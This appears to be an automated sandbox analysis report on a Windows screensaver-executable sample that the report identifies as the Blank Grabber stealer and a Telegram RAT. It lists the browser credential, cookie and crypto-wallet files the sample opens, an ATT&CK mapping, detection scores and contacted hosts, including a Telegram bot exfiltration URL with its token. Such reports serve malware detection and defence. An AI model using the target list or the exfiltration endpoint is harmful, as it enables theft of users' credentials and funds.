Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match

File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2041945157.000001CCD86C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2041945157.000001CCD86C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2320597036.0000028C88DA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 1788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI17882\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: #U202f#U202f#U2005#U00a0.scr.exe PID: 5260, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	4 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	2 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	112 Command and Scripting Interpreter	Logon Script (Windows)	11 Process Injection	21 Obfuscated Files or Information	Security Account Manager	48 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	2 Registry Run Keys / Startup Folder	11 Software Packing	NTDS	151 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	2 Process Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#U202f#U202f#U2005#U00a0.scr.exe	71%	ReversingLabs	Win64.Trojan.Malgent
#U202f#U202f#U2005#U00a0.scr.exe	73%	Virustotal		Browse
#U202f#U202f#U2005#U00a0.scr.exe	100%	Avira	HEUR/AGEN.1351111
#U202f#U202f#U2005#U00a0.scr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\VCRUNTIME140.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd	2%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pyd	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pyd	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ip-api.com	0%	Virustotal		Browse
api.telegram.org	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://www.avito.ru/	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://www.ctrip.com/	0%	URL Reputation	safe
https://www.ctrip.com/	0%	URL Reputation	safe
https://www.leboncoin.fr/	0%	URL Reputation	safe
https://tools.ietf.org/html/rfc2388#section-4.4	0%	URL Reputation	safe
https://weibo.com/	0%	URL Reputation	safe
https://www.msn.com	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://www.reddit.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.amazon.ca/	0%	URL Reputation	safe
https://www.ebay.co.uk/	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://www.ebay.de/	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://www.amazon.com/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://httpbin.org/	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://www.youtube.com/	0%	URL Reputation	safe
https://allegro.pl/	0%	URL Reputation	safe
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	0%	URL Reputation	safe
https://MD8.mozilla.org/1/m	0%	URL Reputation	safe
https://github.com/Blank-c/BlankOBF	0%	Avira URL Cloud	safe
https://bugzilla.mo	0%	URL Reputation	safe
http://tools.ietf.org/html/rfc6125#section-6.4.3	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://www.python.org/download/releases/2.3/mro/.	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
https://account.bellmedia.c	0%	URL Reputation	safe
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	0%	URL Reputation	safe
https://login.microsoftonline.com	0%	URL Reputation	safe
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
https://www.ifeng.com/	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://json.org	0%	URL Reputation	safe
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2920px	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://api.anonfiles.com/upload	0%	Avira URL Cloud	safe
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.microsoftILEEX~1.LNKy./	0%	Avira URL Cloud	safe
https://api.anonfiles.com/upload	1%	Virustotal		Browse
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	0%	Avira URL Cloud	safe
http://cacerts.digi	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2920px	0%	Virustotal		Browse
https://discord.com/api/v9/users/	0%	Virustotal		Browse
https://github.com/Blank-c/BlankOBF	2%	Virustotal		Browse
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	0%	Virustotal		Browse
http://www.microsoftISPLA~1.PNGy.	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0205/	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	1%	Virustotal		Browse
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	0%	Avira URL Cloud	safe
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	0%	Virustotal		Browse
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	0%	Avira URL Cloud	safe
https://github.com/python/cpython/issues/86361.	0%	Avira URL Cloud	safe
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://www.microsoftRUSTT~2JSOy./	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	0%	Virustotal		Browse
https://github.com/python/cpython/issues/86361.	0%	Virustotal		Browse
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	0%	Avira URL Cloud	safe
https://www.python.org/psf/license/	0%	Avira URL Cloud	safe
https://www.bbc.co.uk/	0%	Avira URL Cloud	safe
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	0%	Virustotal		Browse
http://ip-api.com/line/?fields=hostingr	0%	Avira URL Cloud	safe
https://www.python.org/psf/license/	0%	Virustotal		Browse
https://google.com/mail	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	0%	Virustotal		Browse
https://www.python.org/psf/license/)	0%	Avira URL Cloud	safe
https://www.bbc.co.uk/	0%	Virustotal		Browse
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://www.google.com/	0%	Avira URL Cloud	safe
https://peps.python.org/pep-0205/	0%	Virustotal		Browse
https://www.python.org/psf/license/)	0%	Virustotal		Browse
https://www.iqiyi.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot6932251862:AAHJgssLa4FQxIPJOSZL101THMOx2PWVwSE/sendDocument	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Blank-c/BlankOBF	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2059021822.0000028C87D20000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2058548042.0000028C87CE6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2058318262.0000028C87E4B000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.avito.ru/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.microsoft	powershell.exe, 00000029.00000002.2198300195.0000015373670000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ctrip.com/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
